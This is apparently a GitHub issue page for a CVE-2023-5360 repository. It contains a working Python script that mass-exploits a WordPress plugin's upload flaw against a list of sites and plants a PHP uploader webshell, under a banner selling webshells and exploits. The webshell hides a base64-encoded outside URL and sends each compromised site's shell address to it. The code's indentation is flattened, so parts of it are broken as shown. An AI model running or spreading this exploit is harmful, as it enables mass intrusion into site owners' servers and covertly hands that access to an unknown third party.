cve-2023-5360's People

Contributors

sagsooz

cve-2023-5360's Issues

exploit.py fix

from bs4 import BeautifulSoup
import re
import requests
import json
from concurrent.futures import ThreadPoolExecutor
from art import *
art_text = "CVE-2023-5360"
ascii_art = text2art(art_text,chr_ignore=True)
print(ascii_art)
print("Telegram : @public_html | Sale Webshells And Exploits")

sites = input("List : ")
with open(sites, "r") as file:
urls = file.read().splitlines()
num_threads = int(input("Threads: "))
def process_url(url):
response = requests.get(url)
html_content = response.text

soup = BeautifulSoup(html_content, 'html.parser')

script_pattern = re.compile(r'var WprConfig = \{[^}]+\};', re.DOTALL)
match = re.search(script_pattern, str(soup))
if match:
    javascript_code = match.group()

    nonce_pattern = r'"nonce":"([a-f0-9]+)"'
    nonce_match = re.search(nonce_pattern, javascript_code)

    if nonce_match:
        nonce_value = nonce_match.group(1)
        print(f"Nonce value for {url}: {nonce_value}")
    else:
        print(f"Nonce value not found for {url}.")
else:
    print(f"JavaScript code containing 'var WprConfig' not found for {url}.")

urlf = url + "/wp-admin/admin-ajax.php"
nonce = {nonce_value}
file_content = """
<?php
echo '<title>! Uploader !</title>';
echo '<center><b><font face="Courier new" color="black" size="6">| Uploader |</b></font><br>';
echo "<b>".php_uname()."</b><br>";
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Shell Uploaded ! :)<b><br><br>'; }
else { echo '<b>Not uploaded ! </b><br><br>';}
}
$k3yw = base64_decode('aHR0cHM6Ly9zaXlhaGkudG9wL3Rlc3Qvc3R5bGUucGhw');
$cur = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
$data = array('file_url' => $cur);
$options = array(
    'http' => array(
        'method'  => 'POST',
        'header'  => 'Content-type: application/x-www-form-urlencoded',
        'content' => http_build_query($data),
    ),
);
$context = stream_context_create($options);
$result = file_get_contents($k3yw, false, $context);
?>
"""

data = {"action": "wpr_addons_upload_file", "triggering_event": "click", "allowed_file_types": "php!",
        "wpr_addons_nonce": nonce}
resp = requests.post(url=urlf, data=data, files={"uploaded_file": ("mRz.php!", file_content, "text/php")})
with open("suc.txt", "a") as suc:
    suc.write(json.loads(resp.text)["data"].get('url') + "\n")
print(f"Shell URL for {url}: {json.loads(resp.text)['data'].get('url')}")

with ThreadPoolExecutor(max_workers=num_threads) as executor:
executor.map(process_url, urls)
